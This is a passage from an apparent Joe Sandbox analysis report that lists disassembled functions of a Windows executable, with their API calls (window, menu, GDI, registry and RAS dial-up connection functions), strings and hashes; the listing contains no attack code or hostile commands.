Instruction Fuzzy Hash: 58414C71D002199FCB10DFA5C885AEEFBB8EF09345F10416EE515A3242E7789A4ACB58

Function 0043091E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00430923
GetPropA.USER32(?,AfxOldWndProc423), ref: 0043093B
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00430999

Part of subcall function 0043052B: GetWindowRect.USER32(?,?), ref: 00430550
Part of subcall function 0043052B: GetWindow.USER32(?,00000004), ref: 0043056D

SetWindowLongA.USER32(?,000000FC,?), ref: 004309C9
RemovePropA.USER32(?,AfxOldWndProc423), ref: 004309D1
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 004309D8
GlobalDeleteAtom.KERNEL32(00000000), ref: 004309DF

Part of subcall function 00430508: GetWindowRect.USER32(?,?), ref: 00430514

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00430A33

Strings

AfxOldWndProc423, xrefs: 00430931, 00430939, 004309CF, 004309D7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: d610c45e7eafa6b828dd00c634f666926dd5e23ca72297eb3b69a6f7175c102e
Instruction ID: 87f22139c7556cb7c7c7233b8179ef01d2c6a83968e07f487a18200eeb81a0da
Opcode Fuzzy Hash: d610c45e7eafa6b828dd00c634f666926dd5e23ca72297eb3b69a6f7175c102e
Instruction Fuzzy Hash: 2331C172900209BBDF01AFA5DD69EFF7F78EF49311F00122AF901A1152D7388A11DBA9

Function 004354E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 00435507
RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0043551B
RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 00435536
RegQueryValueExA.ADVAPI32(?,0046B4B8,00000000,?,00000000,?,00000104), ref: 0043555F

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

RegCloseKey.ADVAPI32(?,000000FF), ref: 0043557D
RegCloseKey.ADVAPI32(00000001), ref: 00435582
RegCloseKey.ADVAPI32(?), ref: 00435587

Strings

InProcServer32, xrefs: 0043552E
CLSID, xrefs: 004354FA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseOpen$QueryValuelstrlen
String ID: CLSID$InProcServer32
API String ID: 1568031711-323508013
Opcode ID: 26f677a4e36cc0becfc18a9e9e6602ecd07a31736d457209af26a0e97d86a758
Instruction ID: d0fab1bc3f5d9c9f03faba84e77465f62e140e2f72b2689a2c04d9cc669518ba
Opcode Fuzzy Hash: 26f677a4e36cc0becfc18a9e9e6602ecd07a31736d457209af26a0e97d86a758
Instruction Fuzzy Hash: D4113A72A0021CBFDB00EFA5CC84DAE7F79EF58394B10417AFD10A7161E634AE149B94

Function 00449FD0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00449FE1
GetSystemMetrics.USER32(00000048), ref: 0044A001
CreateFontA.GDI32(00000000,?,0044A15E,?,?,0044A1AB,?,?), ref: 0044A008
SelectObject.GDI32(00000000,00000000), ref: 0044A01C
GetCharWidthA.GDI32(00000000,00000036,00000036,0046943C), ref: 0044A02A
SelectObject.GDI32(00000000,00000000), ref: 0044A036
DeleteObject.GDI32(00000000), ref: 0044A039
ReleaseDC.USER32(00000000,00000000), ref: 0044A041

Strings

Marlett, xrefs: 00449FE7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: e0ae274c0651cb1f752dc840acfa658c7450398894c03ba0c31a848610868104
Instruction ID: 047942ba0fdf50593a5988126b96e16e09326b923f9dcc3a79d5cd371fda927a
Opcode Fuzzy Hash: e0ae274c0651cb1f752dc840acfa658c7450398894c03ba0c31a848610868104
Instruction Fuzzy Hash: 7001DF316407907BE2302B336C9CE6F3F2CD7C7FA2B504229F610A21829AB58C00C278

Function 004508B9 Relevance: 15.2, APIs: 10, Instructions: 225COMMON

Download Yara Rule

APIs

GetTextMetricsA.GDI32(?,?), ref: 004508D3
GetTextMetricsA.GDI32(?,?), ref: 004508DF
GetTextExtentPoint32A.GDI32(?,0045A93C,00000001,?), ref: 004508EF
GetTextAlign.GDI32(?), ref: 004508F8
GetCurrentPositionEx.GDI32(?,?), ref: 00450910
GetTabbedTextExtentA.USER32(?,00468740,00000001,00000000,00000000), ref: 0045095E
GetCharWidthA.GDI32(?,?,?,?), ref: 004509C5
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 004509D4
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00450A54
MoveToEx.GDI32(?,?,?,00000000), ref: 00450B02

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: 4721c2d73b0387dd2fc36e22948509fe0ff4eaf9704a18eb477ed5ff88d740ce
Instruction ID: cb7b6af9dee942a43c962551e0a0478b8ba98d3e4900489fee4e6954767a07e8
Opcode Fuzzy Hash: 4721c2d73b0387dd2fc36e22948509fe0ff4eaf9704a18eb477ed5ff88d740ce
Instruction Fuzzy Hash: 9A9144B990020AEFDF14CFA8C884AAEBBB5FF48301F14816AEC55A7216D734AD55CF54

Function 0040C3E0 Relevance: 15.2, APIs: 10, Instructions: 159windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00439113: GetFocus.USER32 ref: 00439116
Part of subcall function 00439113: GetParent.USER32(00000000), ref: 0043913D
Part of subcall function 00439113: GetWindowLongA.USER32(?,000000F0), ref: 00439158
Part of subcall function 00439113: GetParent.USER32(?), ref: 00439166
Part of subcall function 00439113: GetDesktopWindow.USER32 ref: 0043916A
Part of subcall function 00439113: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0043917E

GetMenu.USER32(?), ref: 0040C432
GetMenu.USER32(?), ref: 0040C447
GetMenuItemCount.USER32(00000000), ref: 0040C450
GetSubMenu.USER32(00000000,00000000), ref: 0040C460
GetMenuItemCount.USER32(?), ref: 0040C484
GetMenuItemID.USER32(?,00000000), ref: 0040C4A7
GetSubMenu.USER32(?,?), ref: 0040C4C3
GetMenuItemID.USER32(?,00000000), ref: 0040C4E1
GetMenuItemCount.USER32(?), ref: 0040C514
GetMenuItemID.USER32(?,?), ref: 0040C53B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: bc3268efee8f48d2c6bca0df9b567dbe5db9547cbc602e08e52accf69ae357c3
Instruction ID: ee4133c42be38bc232af3881e7f2f11b999c85b95e02953378e80f60f0b40d5c
Opcode Fuzzy Hash: bc3268efee8f48d2c6bca0df9b567dbe5db9547cbc602e08e52accf69ae357c3
Instruction Fuzzy Hash: 66512CB4604316EFC714DF35C9E092FB7E8AB88750F504A2EF95597381EA38E805CB99

Function 00446E48 Relevance: 15.1, APIs: 10, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00439113: GetFocus.USER32 ref: 00439116
Part of subcall function 00439113: GetParent.USER32(00000000), ref: 0043913D
Part of subcall function 00439113: GetWindowLongA.USER32(?,000000F0), ref: 00439158
Part of subcall function 00439113: GetParent.USER32(?), ref: 00439166
Part of subcall function 00439113: GetDesktopWindow.USER32 ref: 0043916A
Part of subcall function 00439113: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0043917E

GetMenu.USER32(?), ref: 00446EAB
GetMenu.USER32(?), ref: 00446EBF
GetMenuItemCount.USER32(00000000), ref: 00446EC8
GetSubMenu.USER32(00000000,00000000), ref: 00446ED9
GetMenuItemCount.USER32(?), ref: 00446EFB
GetMenuItemID.USER32(?,00000000), ref: 00446F1C
GetSubMenu.USER32(?,00000000), ref: 00446F34
GetMenuItemID.USER32(?,00000000), ref: 00446F4C
GetMenuItemCount.USER32(?), ref: 00446F83
GetMenuItemID.USER32(?,00000000), ref: 00446FA1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: b0b149b01602a469a92e5e6b96ec1da4433b73b4f97d1d09570902a99fe4dc00
Instruction ID: 64b5a8a73ffcb334e242a349bb29da0882651d6eb464fb66b762f199b31fa78b
Opcode Fuzzy Hash: b0b149b01602a469a92e5e6b96ec1da4433b73b4f97d1d09570902a99fe4dc00
Instruction Fuzzy Hash: 1151AF31A00609AFEF11AFA4DD80AAEB7F5FF09311F21446AE411E6261D739DD45CF2A

Function 00445E28 Relevance: 15.1, APIs: 10, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00445E55
GetWindow.USER32(00000000), ref: 00445E62
IsWindowEnabled.USER32(00000000), ref: 00445E6F
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00445E9E
GetWindow.USER32(00000000,00000002), ref: 00445EAC
GetDesktopWindow.USER32 ref: 00445ED4
GetWindow.USER32(00000000), ref: 00445EDB
IsWindowEnabled.USER32(00000000), ref: 00445EE4
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00445F13
EnableWindow.USER32(00000000,00000000), ref: 00445F1F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: fb5da62043e4ee65328e25531bc3042e06bf03526b81ff9094f1c630c6988790
Instruction ID: 60bf613f906ca2d5a85e14670128619b2a772af918db824d09acd37680c31f24
Opcode Fuzzy Hash: fb5da62043e4ee65328e25531bc3042e06bf03526b81ff9094f1c630c6988790
Instruction Fuzzy Hash: 3F31D431205B196FFB216F629C05F6B769CEF01751F19003AFE01DA293DB68C9018AAE

Function 00440CF0 Relevance: 15.1, APIs: 10, Instructions: 96COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 00440D06
GetWindowRect.USER32(?,?), ref: 00440D1D
SetRect.USER32(?,?,00000000,?,?), ref: 00440D57
InvalidateRect.USER32(?,?,00000001), ref: 00440D66
SetRect.USER32(?,?,00000000,?,?), ref: 00440D7D
InvalidateRect.USER32(?,?,00000001), ref: 00440D8C
SetRect.USER32(?,00000000,?,?,?), ref: 00440DB7
InvalidateRect.USER32(?,?,00000001), ref: 00440DC2
SetRect.USER32(?,00000000,?,?,?), ref: 00440DD9
InvalidateRect.USER32(?,?,00000001), ref: 00440DE4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: f6c55a0891c43df2330bceb4f184a2660c63c5bc00ca5220258293c0823e1df0
Instruction ID: 5aa03f2dea7f15a3e64220b2377093d700167a4edaa3ccd8cf8e9814242f9e2e
Opcode Fuzzy Hash: f6c55a0891c43df2330bceb4f184a2660c63c5bc00ca5220258293c0823e1df0
Instruction Fuzzy Hash: 65310CB290060ABFDB10CF94DD88FAE7B7DEB04305F104125FA01A71A1D7B0BA94CBA5

Function 0040F570 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 128registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryA.ADVAPI32(00000000,80000006,?), ref: 0040F5E0
RegOpenKeyExA.ADVAPI32(?,PerfStats\StartStat,00000000,00020019,?,?,?), ref: 0040F603
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?), ref: 0040F65F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?), ref: 0040F68A
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040F6BE
RegCloseKey.ADVAPI32(?,?,?), ref: 0040F6DD

Strings

PerfStats\StartStat, xrefs: 0040F5FD
%s\%s, xrefs: 0040F62E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseQueryValue$ConnectOpenRegistry
String ID: %s\%s$PerfStats\StartStat
API String ID: 1543998473-1184255679
Opcode ID: b257f03012ef1bc33409f2a94edb71f5c02a7e97ca28823736175137405af183
Instruction ID: 591691259d63be6d3226759691d29d2a47e949c486bdaae9a3fa33dc1eea3668
Opcode Fuzzy Hash: b257f03012ef1bc33409f2a94edb71f5c02a7e97ca28823736175137405af183
Instruction Fuzzy Hash: 30418171204305AFD324DF64DC81EAB77E8EBC8714F404A3EF55693281EA74D909C7A6

Function 00405960 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00405A38
GetWindowRect.USER32(?,?), ref: 00405A80

Part of subcall function 0042F2C1: lstrlenA.KERNEL32(?,?,00000000,?,0040127F,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 0042F2EB

Part of subcall function 0040E280: RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E2DD
Part of subcall function 0040E280: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?), ref: 0040E317
Part of subcall function 0040E280: RegCloseKey.ADVAPI32(?), ref: 0040E32E

Part of subcall function 0040D790: Shell_NotifyIconA.SHELL32(00000002,?), ref: 0040D7A7

Strings

MainFrmPos, xrefs: 00405A42
MainFrmSize, xrefs: 00405A61
AllowQuit, xrefs: 0040599D
MainColumns, xrefs: 00405AA4
MainFrmSplitPos, xrefs: 00405A8C
Settings, xrefs: 004059B1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: RectWindow$CloseCreateIconNotifyQueryShell_Valuelstrlen
String ID: AllowQuit$MainColumns$MainFrmPos$MainFrmSize$MainFrmSplitPos$Settings
API String ID: 3578312639-1315315818
Opcode ID: b6c95fc6edc83bd5a0eeaf7f4c5b7e55bb8415060b360b3c5f7b3df442a983a7
Instruction ID: b50523c5ecbac6bf03f61c5c9b4422e3c0de6a0a801f21a4c37d31284679d908
Opcode Fuzzy Hash: b6c95fc6edc83bd5a0eeaf7f4c5b7e55bb8415060b360b3c5f7b3df442a983a7
Instruction Fuzzy Hash: B9418471B10514AFDB04EF99D882FAEB7B4FF44714F14426EF805A7281DA79AC048FA6

Function 004161E3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 004161FA
SetMapMode.GDI32(00000000,00000003), ref: 00416205
LPtoDP.GDI32(00000000,?,00000002), ref: 0041622E
__ftol.LIBCMT ref: 00416277
__ftol.LIBCMT ref: 00416282
DPtoLP.GDI32(00000000,?,00000002), ref: 00416291
ReleaseDC.USER32(?,00000000), ref: 004162D5

Strings

W, xrefs: 004162C4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: __ftol$ModeRelease
String ID: W
API String ID: 1379597261-655174618
Opcode ID: 2d986eaa1425ff259da1c334717ca5724ac18b6cc6a0878ccbec4f3ca5ba532d
Instruction ID: 14e5291b2962e31a5cb79e27a7dd3fc6f23e504409632be0aaac4e7bcc482c60
Opcode Fuzzy Hash: 2d986eaa1425ff259da1c334717ca5724ac18b6cc6a0878ccbec4f3ca5ba532d
Instruction Fuzzy Hash: 47415A74A01209EFCB04DF98C598AEEBBB4FF44300F12849AE8566B391C734DA50CF54

Function 00410E90 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

QueryServiceStatus.ADVAPI32(00000000,?), ref: 00410EC5
LoadLibraryA.KERNEL32(RASAPI32.DLL), ref: 00410EFE

Strings

RasEnumConnectionsA, xrefs: 00410F2A
RASAPI32.DLL, xrefs: 00410EF9
RasGetConnectStatusA, xrefs: 00410F38

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LibraryLoadQueryServiceStatus
String ID: RASAPI32.DLL$RasEnumConnectionsA$RasGetConnectStatusA
API String ID: 3236685635-3302991464
Opcode ID: 8757fb62dcb0b1cd4874d0cf69caf9cce589abb497ebd8c1256c978fa6e92e71
Instruction ID: e3ce76c8360f26a494cd792bba74495d6cf185c889713e126ecfccb07074a4c4
Opcode Fuzzy Hash: 8757fb62dcb0b1cd4874d0cf69caf9cce589abb497ebd8c1256c978fa6e92e71
Instruction Fuzzy Hash: 453108B46043019FD300CF26DD55BA677E8FB88718F444569E809D7360E7B9D9808F9A

Function 00410FC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

QueryServiceStatus.ADVAPI32(00000000,00000000,00000000,?,?,?,?,004107B0), ref: 00410FD9
LoadLibraryA.KERNEL32(RASAPI32.DLL,00000000,?,?,?,?,004107B0), ref: 00410FF8
GetProcAddress.KERNEL32(00000000,RasEnumConnectionsA), ref: 00411035
GetProcAddress.KERNEL32(00000000,RasGetConnectStatusA), ref: 00411048
FreeLibrary.KERNEL32(00000000,?,?,?,004107B0), ref: 00411080

Strings

RasEnumConnectionsA, xrefs: 0041102F
RASAPI32.DLL, xrefs: 00410FF3
RasGetConnectStatusA, xrefs: 0041103D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressLibraryProc$FreeLoadQueryServiceStatus
String ID: RASAPI32.DLL$RasEnumConnectionsA$RasGetConnectStatusA
API String ID: 2780661430-3302991464
Opcode ID: 484fffd8fb3bb20e4c99abb3178e6735f9175204025fd178024bad0de1c1fd94
Instruction ID: 2279e32dae92ece53702c1f156d2b040fe9aab32babbdf5a165d2bb28ab8be3a
Opcode Fuzzy Hash: 484fffd8fb3bb20e4c99abb3178e6735f9175204025fd178024bad0de1c1fd94
Instruction Fuzzy Hash: 09212E74600301AFD700CF29DD54B96B7E8EB88708F44452AE819C3760E7B5D8C08F8A

Function 004324CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0043251B
SetActiveWindow.USER32(?), ref: 0043252D
SendMessageA.USER32(?,00000112,?,?), ref: 00432543
IsWindow.USER32(?), ref: 00432550
SetActiveWindow.USER32(?), ref: 00432557
IsWindow.USER32(?), ref: 0043255C
SetFocus.USER32(?), ref: 00432566

Strings

u, xrefs: 00432571

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

